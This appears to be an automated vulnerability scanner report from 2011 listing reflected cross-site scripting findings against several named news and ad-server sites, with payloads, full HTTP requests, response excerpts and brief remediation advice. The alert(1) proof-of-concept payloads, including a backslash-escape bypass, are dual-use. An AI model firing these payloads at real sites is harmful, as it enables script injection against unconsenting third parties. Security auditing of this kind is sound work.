Referer: http://www.mysuburbanlife.com/lyons/lifestyle/entertainment/x1539859994/To-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:33:28 GMT
Server: Microsoft-IIS/6.0
X-Server-Name: WS6
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 74519

document.write('<script type="text/javascript" src="http://shop.mysuburbanlife.com/content/pops.js"></script><link rel="stylesheet" type="text/css" href="http://shop.mysuburbanlife.com/content/pops.cs
...[SNIP]...
<a href="http://shop.mysuburbanlife.com/ROP/Ads.aspx?ptype=ROPP_ADV_LIST6BE1A\\';ALERT(1)//B579F80B78C&amp;adid=11009420&amp;advid=1360889" class="t-rop-ad-anchor" target="" id="rop-ad/11009420-300x460">
...[SNIP]...

2.122. http://shop.mysuburbanlife.com/ROP/portablerop.aspx [viewmore parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mysuburbanlife.com
Path:   /ROP/portablerop.aspx

Issue detail

The value of the viewmore request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dec08\'%3balert(1)//ffa7e553f8f was submitted in the viewmore parameter. This input was echoed as dec08\\';alert(1)//ffa7e553f8f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /ROP/portablerop.aspx?wrap=5&pop=m&advlist=true&bullet=blue&title=Advertisers&viewmore=View%20more%20%3Edec08\'%3balert(1)//ffa7e553f8f&titlelink=true&track=Adv_List HTTP/1.1
Host: shop.mysuburbanlife.com
Proxy-Connection: keep-alive
Referer: http://www.mysuburbanlife.com/lyons/lifestyle/entertainment/x1539859994/To-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:33:14 GMT
Server: Microsoft-IIS/6.0
X-Server-Name: WS6
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 68549

document.write('<script type="text/javascript" src="http://shop.mysuburbanlife.com/content/pops.js"></script><link rel="stylesheet" type="text/css" href="http://shop.mysuburbanlife.com/content/pops.cs
...[SNIP]...
<a href="http://shop.mysuburbanlife.com/ROP/" title="Click to view more Advertisers" target="">View more &gt;dec08\\';alert(1)//ffa7e553f8f</a>
...[SNIP]...

2.123. http://showadsak.pubmatic.com/AdServer/AdServerServlet [pageURL parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The value of the pageURL request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 301af'-alert(1)-'55b63ce7126 was submitted in the pageURL parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=25273&siteId=25277&adId=19976&kadwidth=728&kadheight=90&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://bpx.a9.com/amzn/iframe.html301af'-alert(1)-'55b63ce7126&frameName=http_bpx_a9_comamzniframe_htmlkomli_ads_frame12527325277&kltstamp=2011-4-12%208%3A31%3A14&ranreq=0.5169705713633448&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://bpx.a9.com/amzn/iframe.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_22=488-pcv:1|uid:2931142961646634775; KRTBCOOKIE_57=476-uid:2724386019227846218; KRTBCOOKIE_27=1216-uid:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; KRTBCOOKIE_133=1873-xrd52zkwjuxh; KRTBCOOKIE_53=424-c1e1301e-3a1f-4ca7-9870-f636b5f10e66; KADUSERCOOKIE=29E43D8F-52C5-4C7B-B2EA-0181496E6671; KRTBCOOKIE_148=1699-uid:978972DFA063000D2C0E7A380BFA1DEC; PMAT=37G1VCuXv0TgpuQmot_U9evlQ-ZwaOOPD56uOCkcTeBe18znStqcWJQ; pubtime_16486=TMC; KRTBCOOKIE_80=1336-8218888f-9a83-4760-bd14-33b4666730c0.11265.49026.49027.59012.8.50185.17163.50060.17154.50064.4625.50056.57454.10518.6551.48153.48156.48157.10656.1073.24493.39944.14769.39804.38582.1097.23864.57145.45714.57148.30653.10504.10047.17857.41538.13893.55494.; KRTBCOOKIE_58=1344-AM-00000000030620452; KRTBCOOKIE_179=2451-uid:17647108006034089; KRTBCOOKIE_16=226-uid:3419824627245671268; KRTBCOOKIE_204=3579-0c2aede6-6bb6-11e0-8fe6-0025900a8ffe; KRTBCOOKIE_200=3683-87e0a5c4e03157bf2bf35233d8beea408fe3ad97e13305ea22fd5334debaeb40; pubtime_26167=TMC; PUBRETARGET=82_1397691450.78_1397834769.1246_1397970193.1985_1307320077.362_1306098764.1039_1306254899.617_1398451593.70_1306768104.1359_1306933483.1555_1398966889.806_1336137316.1765_1307641382.79_1305212190.76_1307717967; camfreq=614-2_1305212400; pubfreq_16486=165-1; pubfreq_26167=661-2:243-10:460-1; PUBMDCID=2; PMDTSHR=; KTPCACOOKIE=YES

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Thu, 12 May 2011 13:33:19 GMT
Connection: close
Set-Cookie: PUBMDCID=2; domain=pubmatic.com; expires=Fri, 11-May-2012 13:33:19 GMT; path=/
Set-Cookie: pubfreq_25277=; domain=pubmatic.com; expires=Sat, 14-May-2011 13:33:19 GMT; path=/
Set-Cookie: pubtime_25277=TMC; domain=pubmatic.com; expires=Fri, 13-May-2011 13:33:19 GMT; path=/
Set-Cookie: _curtime=1305207199; domain=pubmatic.com; expires=Thu, 12-May-2011 14:43:19 GMT; path=/
Set-Cookie: pubfreq_25277_19976_1033750466=243-1; domain=pubmatic.com; expires=Thu, 12-May-2011 14:13:19 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Fri, 13-May-2011 13:33:19 GMT; path=/
Content-Length: 1558

document.writeln('<'+'script type="text/javascript" src="http://ad.media6degrees.com/adserv/cs?tId=9933739605160317|cb=1305207199|adType=ad|cId=6524|ec=1|spId=32750|advId=1065|exId=22|price=3.0000|pub
...[SNIP]...
height=90&kltstamp=1305207199&indirectAdId=0&adServerOptimizerId=2&ranreq=0.5169705713633448&campaignId=1873&creativeId=0&pctr=0.000000&pixelId=1039&imprCap=1&pageURL=http://bpx.a9.com/amzn/iframe.html301af'-alert(1)-'55b63ce7126">
...[SNIP]...

2.124. http://showadsak.pubmatic.com/AdServer/AdServerServlet [ranreq parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The value of the ranreq request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eeb4f'-alert(1)-'c857c4e6058 was submitted in the ranreq parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=25273&siteId=25277&adId=19976&kadwidth=728&kadheight=90&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://bpx.a9.com/amzn/iframe.html&frameName=http_bpx_a9_comamzniframe_htmlkomli_ads_frame12527325277&kltstamp=2011-4-12%208%3A31%3A14&ranreq=0.5169705713633448eeb4f'-alert(1)-'c857c4e6058&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://bpx.a9.com/amzn/iframe.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_22=488-pcv:1|uid:2931142961646634775; KRTBCOOKIE_57=476-uid:2724386019227846218; KRTBCOOKIE_27=1216-uid:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; KRTBCOOKIE_133=1873-xrd52zkwjuxh; KRTBCOOKIE_53=424-c1e1301e-3a1f-4ca7-9870-f636b5f10e66; KADUSERCOOKIE=29E43D8F-52C5-4C7B-B2EA-0181496E6671; KRTBCOOKIE_148=1699-uid:978972DFA063000D2C0E7A380BFA1DEC; PMAT=37G1VCuXv0TgpuQmot_U9evlQ-ZwaOOPD56uOCkcTeBe18znStqcWJQ; pubtime_16486=TMC; KRTBCOOKIE_80=1336-8218888f-9a83-4760-bd14-33b4666730c0.11265.49026.49027.59012.8.50185.17163.50060.17154.50064.4625.50056.57454.10518.6551.48153.48156.48157.10656.1073.24493.39944.14769.39804.38582.1097.23864.57145.45714.57148.30653.10504.10047.17857.41538.13893.55494.; KRTBCOOKIE_58=1344-AM-00000000030620452; KRTBCOOKIE_179=2451-uid:17647108006034089; KRTBCOOKIE_16=226-uid:3419824627245671268; KRTBCOOKIE_204=3579-0c2aede6-6bb6-11e0-8fe6-0025900a8ffe; KRTBCOOKIE_200=3683-87e0a5c4e03157bf2bf35233d8beea408fe3ad97e13305ea22fd5334debaeb40; pubtime_26167=TMC; PUBRETARGET=82_1397691450.78_1397834769.1246_1397970193.1985_1307320077.362_1306098764.1039_1306254899.617_1398451593.70_1306768104.1359_1306933483.1555_1398966889.806_1336137316.1765_1307641382.79_1305212190.76_1307717967; camfreq=614-2_1305212400; pubfreq_16486=165-1; pubfreq_26167=661-2:243-10:460-1; PUBMDCID=2; PMDTSHR=; KTPCACOOKIE=YES

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Thu, 12 May 2011 13:33:20 GMT
Connection: close
Set-Cookie: PUBMDCID=2; domain=pubmatic.com; expires=Fri, 11-May-2012 13:33:20 GMT; path=/
Set-Cookie: pubfreq_25277=; domain=pubmatic.com; expires=Sat, 14-May-2011 13:33:20 GMT; path=/
Set-Cookie: pubtime_25277=TMC; domain=pubmatic.com; expires=Fri, 13-May-2011 13:33:20 GMT; path=/
Set-Cookie: pubfreq_25277_19976_1883964808=661-1; domain=pubmatic.com; expires=Thu, 12-May-2011 14:13:20 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Fri, 13-May-2011 13:33:20 GMT; path=/
Content-Length: 1753

document.write('<div id="http_bpx_a9_comamzniframe_htmlkomli_ads_frame12527325277" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=uWIAAL1iAAAIT
...[SNIP]...
eId=25277&adId=19976&adServerId=661&kefact=1.299975&kpbmtpfact=0.000000&kadNetFrequecy=1&kadwidth=728&kadheight=90&kltstamp=1305207200&indirectAdId=24818&adServerOptimizerId=1&ranreq=0.5169705713633448eeb4f'-alert(1)-'c857c4e6058&imprCap=1&pageURL=http://bpx.a9.com/amzn/iframe.html">
...[SNIP]...

2.125. http://www.courierpress.com/news/2011/may/12/heder-here-in-this-spp-ppppp/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.courierpress.com
Path:   /news/2011/may/12/heder-here-in-this-spp-ppppp/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c08f"><script>alert(1)</script>b6dbed5532a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news8c08f"><script>alert(1)</script>b6dbed5532a/2011/may/12/heder-here-in-this-spp-ppppp/ HTTP/1.1
Host: www.courierpress.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 NOT FOUND
Date: Thu, 12 May 2011 13:32:06 GMT
Server: Apache/2.2.3 (Red Hat)
Vary: Cookie,Accept-Encoding
Content-Type: text/html; charset=utf-8
X-Varnish: 134351975
Age: 0
Via: 1.1 varnish
X-Cache: MISS
Connection: close
Content-Length: 84961

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
<form action="/accounts/login/?next=/news8c08f"><script>alert(1)</script>b6dbed5532a/2011/may/12/heder-here-in-this-spp-ppppp/" method="post" id="loginform1">
...[SNIP]...

2.126. http://www.courierpress.com/news/2011/may/12/heder-here-in-this-spp-ppppp/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.courierpress.com
Path:   /news/2011/may/12/heder-here-in-this-spp-ppppp/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f799"><script>alert(1)</script>b868d2523b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/20113f799"><script>alert(1)</script>b868d2523b/may/12/heder-here-in-this-spp-ppppp/ HTTP/1.1
Host: www.courierpress.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 NOT FOUND
Date: Thu, 12 May 2011 13:32:07 GMT
Server: Apache/2.2.3 (Red Hat)
Vary: Cookie,Accept-Encoding
Content-Type: text/html; charset=utf-8
X-Varnish: 946343016
Age: 0
Via: 1.1 varnish
X-Cache: MISS
Connection: close
Content-Length: 84893

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
<form action="/accounts/login/?next=/news/20113f799"><script>alert(1)</script>b868d2523b/may/12/heder-here-in-this-spp-ppppp/" method="post" id="loginform1">
...[SNIP]...

2.127. http://www.courierpress.com/news/2011/may/12/heder-here-in-this-spp-ppppp/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.courierpress.com
Path:   /news/2011/may/12/heder-here-in-this-spp-ppppp/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cae9f"><script>alert(1)</script>80eb65e6163 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/2011/maycae9f"><script>alert(1)</script>80eb65e6163/12/heder-here-in-this-spp-ppppp/ HTTP/1.1
Host: www.courierpress.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 NOT FOUND
Date: Thu, 12 May 2011 13:32:10 GMT
Server: Apache/2.2.3 (Red Hat)
Vary: Cookie,Accept-Encoding
Content-Type: text/html; charset=utf-8
X-Varnish: 1531074518
Age: 0
Via: 1.1 varnish
X-Cache: MISS
Connection: close
Content-Length: 84900

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
<form action="/accounts/login/?next=/news/2011/maycae9f"><script>alert(1)</script>80eb65e6163/12/heder-here-in-this-spp-ppppp/" method="post" id="loginform1">
...[SNIP]...

2.128. http://www.courierpress.com/news/2011/may/12/heder-here-in-this-spp-ppppp/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.courierpress.com
Path:   /news/2011/may/12/heder-here-in-this-spp-ppppp/

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47efa"><script>alert(1)</script>8b4c9f9ffa was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/2011/may/1247efa"><script>alert(1)</script>8b4c9f9ffa/heder-here-in-this-spp-ppppp/ HTTP/1.1
Host: www.courierpress.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 NOT FOUND
Date: Thu, 12 May 2011 13:32:11 GMT
Server: Apache/2.2.3 (Red Hat)
Vary: Cookie,Accept-Encoding
Content-Type: text/html; charset=utf-8
X-Varnish: 1603506712
Age: 0
Via: 1.1 varnish
X-Cache: MISS
Connection: close
Content-Length: 84954

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
<form action="/accounts/login/?next=/news/2011/may/1247efa"><script>alert(1)</script>8b4c9f9ffa/heder-here-in-this-spp-ppppp/" method="post" id="loginform1">
...[SNIP]...

2.129. http://www.courierpress.com/news/2011/may/12/heder-here-in-this-spp-ppppp/ [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.courierpress.com
Path:   /news/2011/may/12/heder-here-in-this-spp-ppppp/

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b694c"><script>alert(1)</script>1fa13f77dcf was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/2011/may/12/heder-here-in-this-spp-pppppb694c"><script>alert(1)</script>1fa13f77dcf/ HTTP/1.1
Host: www.courierpress.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 NOT FOUND
Date: Thu, 12 May 2011 13:32:12 GMT
Server: Apache/2.2.3 (Red Hat)
Vary: Cookie,Accept-Encoding
Content-Type: text/html; charset=utf-8
X-Varnish: 2061608789
Age: 0
Via: 1.1 varnish
X-Cache: MISS
Connection: close
Content-Length: 84900

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
<form action="/accounts/login/?next=/news/2011/may/12/heder-here-in-this-spp-pppppb694c"><script>alert(1)</script>1fa13f77dcf/" method="post" id="loginform1">
...[SNIP]...

2.130. http://www.pcworld.com/pcworldconnect/comment_registration [callingurl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /pcworldconnect/comment_registration

Issue detail

The value of the callingurl request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 125d0"><img%20src%3da%20onerror%3dalert(1)>0753613c8b936b7cc was submitted in the callingurl parameter. This input was echoed as 125d0"><img src=a onerror=alert(1)>0753613c8b936b7cc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /pcworldconnect/comment_registration?callingurl=http%3A%2F%2Fwww.pcworld.com%2Farticle%2F227430%2Fchrome_os_will_likely_include_netflix_support.html125d0"><img%20src%3da%20onerror%3dalert(1)>0753613c8b936b7cc HTTP/1.1
Host: www.pcworld.com
Proxy-Connection: keep-alive
Referer: http://www.pcworld.com/article/227430/chrome_os_will_likely_include_netflix_support.html
Origin: http://www.pcworld.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=205278865.1303674274.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26DA3ECF051D0C7D-400001086000024E[CE]; __utma=205278865.1910705707.1303674274.1305051777.1305206882.3; __utmb=205278865; __utmc=205278865; pcw.last_uri=/article/227430/chrome_os_will_likely_include_netflix_support.html; JSESSIONID=41732781CC4F99C762F0377664240A50; fsr.a=1305206922003; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:30:21 GMT
Server: Apache
X-GasHost: gas1
X-Cooking-With: Gasoline-Proxy
X-GasOriginRetry: 0
X-GasOriginTime: 0
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=37DBA5BF4885B3CA496B7FAFE45B1DC7; Path=/
Vary: Accept-Encoding
Content-Length: 6275


<div class="userAction radius_5" style="display:none;" id="regCommentFormContainer">
<span class="tail"></span>
<img class="png astrisk" src="http://images.pcworld.com/images/shar
...[SNIP]...
<input type="hidden" id="callingurl" name="callingurl" value="http://www.pcworld.com/article/227430/chrome_os_will_likely_include_netflix_support.html125d0"><img src=a onerror=alert(1)>0753613c8b936b7cc" />
...[SNIP]...

2.131. http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.zdnet.com
Path:   /blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fbf8f'-alert(1)-'4b23fb4be7c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773fbf8f'-alert(1)-'4b23fb4be7c HTTP/1.1
Host: www.zdnet.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:29:55 GMT
Server: Apache
Set-Cookie: geo-data=%7B%22region%22%3A%22vt%22%2C%22connectionspeed%22%3A%22broadband%22%2C%22regionconf%22%3A%225%22%2C%22metrocode%22%3A%22523%22%2C%22longittude%22%3A%22-72.646%22%2C%22countrycode%22%3A%22840%22%2C%22continentcode%22%3A%226%22%2C%22countryconf%22%3A%225%22%2C%22country%22%3A%22usa%22%2C%22city%22%3A%22stowe%22%2C%22cityconf%22%3A%225%22%2C%22citycode%22%3A%227029%22%2C%22domain%22%3A%22BNET%22%2C%22regioncode%22%3A%2246%22%2C%22latitude%22%3A%2244.5%22%7D; expires=Fri, 11-May-2012 13:29:55 GMT; path=/; domain=.zdnet.com
Content-Type: text/html; charset=utf-8
Cache-Control: private
Content-Length: 100861

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<me
...[SNIP]...
<script type="text/javascript">
(function() {
var toolbar = new CNB.Toolbar('toolbar-207595', {
'cid': '207595',
'serviceCid': 'desktop_5773fbf8f'-alert(1)-'4b23fb4be7c',
'title': 'Can Intel Cedar Trail Atom processors, along with Google Chromebooks, resurrect the netbook?',
'summary': 'Pity the poor netbook. Once tech&rsquo;s darling, it&rsquo;s been
...[SNIP]...

2.132. http://www.zdnet.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.zdnet.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 937ea"><a>15ddfa8a42c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /937ea"><a>15ddfa8a42c HTTP/1.1
Host: www.zdnet.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
